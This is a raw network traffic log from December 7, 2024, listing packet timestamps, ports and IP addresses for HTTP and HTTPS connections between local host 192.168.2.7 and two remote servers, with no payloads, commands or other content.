Dec 7, 2024 12:59:41.426363945 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:41.546138048 CET	80	49743	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:41.546274900 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:41.546356916 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:41.546545029 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:41.666256905 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:41.805811882 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.805887938 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.805988073 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.806260109 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.806289911 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.806304932 CET	49783	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.806312084 CET	443	49783	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.806606054 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.806679010 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.806720018 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.807172060 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.807193995 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.807208061 CET	49784	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.807214022 CET	443	49784	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.808624983 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.809190989 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.809225082 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.809653044 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.809667110 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.810408115 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.810440063 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.810498953 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.810688972 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.810703993 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.810928106 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.810982943 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.811028957 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.811486006 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.811505079 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.811517000 CET	49785	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.811522961 CET	443	49785	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.811863899 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.811897039 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.811949968 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.812586069 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.812607050 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.813580036 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.813591003 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.813648939 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.813766003 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.813776016 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.855211973 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.855268955 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.855321884 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.855513096 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.855528116 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.855539083 CET	49786	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.855544090 CET	443	49786	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.858190060 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.858215094 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:41.858289957 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.858438969 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:41.858449936 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.501012087 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.501081944 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.501147985 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.501456022 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.501477957 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.501490116 CET	49787	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.501496077 CET	443	49787	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.505028009 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.505052090 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:42.505132914 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.505284071 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:42.505291939 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.356549978 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.357287884 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.357314110 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.357793093 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.357800961 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.402873993 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:43.402935028 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:43.557883978 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.558981895 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.564178944 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.564208031 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.564654112 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.564660072 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.564954042 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.564969063 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.565365076 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.565370083 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.606710911 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.607280016 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.607304096 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.607758045 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.607767105 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.743809938 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:43.791927099 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.792001009 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.792043924 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.792227030 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.792258024 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.792269945 CET	49791	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.792277098 CET	443	49791	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.794881105 CET	49794	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.794918060 CET	443	49794	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.794975996 CET	49794	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.795197964 CET	49794	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.795211077 CET	443	49794	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.863543987 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:43.992371082 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.992439985 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.992556095 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.992815018 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.992836952 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.992858887 CET	49789	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.992865086 CET	443	49789	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.992976904 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.993041039 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.993099928 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.994363070 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.994363070 CET	49790	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:43.994379997 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:43.994390011 CET	443	49790	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.024313927 CET	49795	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024350882 CET	49796	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024358034 CET	443	49795	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.024374962 CET	443	49796	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.024434090 CET	49795	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024468899 CET	49796	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024616003 CET	49795	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024631023 CET	443	49795	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.024734020 CET	49796	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.024744987 CET	443	49796	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.097928047 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.097999096 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.098150969 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.098412037 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.098427057 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.098438978 CET	49792	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.098444939 CET	443	49792	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.101525068 CET	49797	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.101572990 CET	443	49797	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.101655960 CET	49797	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.101833105 CET	49797	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.101847887 CET	443	49797	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.193429947 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.193535089 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.193562984 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.193600893 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.193963051 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.194015980 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.194204092 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.194215059 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.194252014 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.194638014 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.194686890 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.195086002 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.195095062 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.195135117 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.195498943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.195544004 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.195882082 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.195933104 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.202917099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.202976942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.224983931 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.225713968 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.225744009 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.226233006 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.226238966 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.313523054 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.313591003 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.313755989 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.313800097 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.317675114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.317743063 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.327739000 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.327749968 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.327780962 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.327811003 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.385225058 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.385293007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.385341883 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.385377884 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.389223099 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.389282942 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.390749931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.390794992 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.390932083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.390969992 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.399009943 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.399071932 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.399208069 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.399250984 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.407219887 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.407396078 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.407434940 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.407480001 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.415479898 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.415534973 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.415651083 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.415695906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.423738003 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.423825979 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.423890114 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.423930883 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.431948900 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.431999922 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.432159901 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.432204008 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.440192938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.440248966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.440403938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.440450907 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.448498011 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.448632002 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.448689938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.448728085 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.456208944 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.456285954 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.456347942 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.456389904 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.517673969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.517749071 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.517765045 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.517807961 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.521045923 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.521115065 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.577188969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.577320099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.577344894 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.577389956 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.579215050 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.579272985 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.579422951 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.579468012 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.583304882 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.583375931 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.585331917 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.585386038 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.585602999 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.585649967 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.588979959 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.589037895 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.589128971 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.589176893 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.593113899 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.593183994 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.593358994 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.593410969 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.597160101 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.597215891 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.597357988 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.597404957 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.601397038 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.601454020 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.601532936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.601579905 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.606128931 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.606180906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.606267929 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.606312037 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.610158920 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.610213041 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.610291004 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.610333920 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.613737106 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.613795996 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.613864899 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.613912106 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.617728949 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.617798090 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.617913961 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.617959976 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.621953964 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.622023106 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.622134924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.622183084 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.625972986 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.626035929 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.626164913 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.626213074 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.630034924 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.630091906 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.630292892 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.630342007 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.634151936 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.634202003 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.634351969 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.634397984 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.638386965 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.638443947 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.638586998 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.638633966 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.642401934 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.642451048 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.642600060 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.642651081 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.646517992 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.646570921 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.646784067 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.646831036 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.650593042 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.650655031 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.650903940 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.650953054 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.654726028 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.654788971 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.654911041 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.654954910 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.658781052 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.658854008 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.659545898 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.659611940 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.659662962 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.659885883 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.659904957 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.659917116 CET	49793	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.659923077 CET	443	49793	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.663230896 CET	49798	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.663265944 CET	443	49798	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.663398981 CET	49798	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.663552046 CET	49798	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:44.663563967 CET	443	49798	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:44.709672928 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.709732056 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.709850073 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.709887028 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.711710930 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.711932898 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.711970091 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.712011099 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.715821981 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.715883970 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.769397020 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.769459009 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.769535065 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.769583941 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.770518064 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.770567894 CET	49788	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:44.770705938 CET	80	49788	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:44.770750046 CET	49788	80	192.168.2.7	185.215.113.206
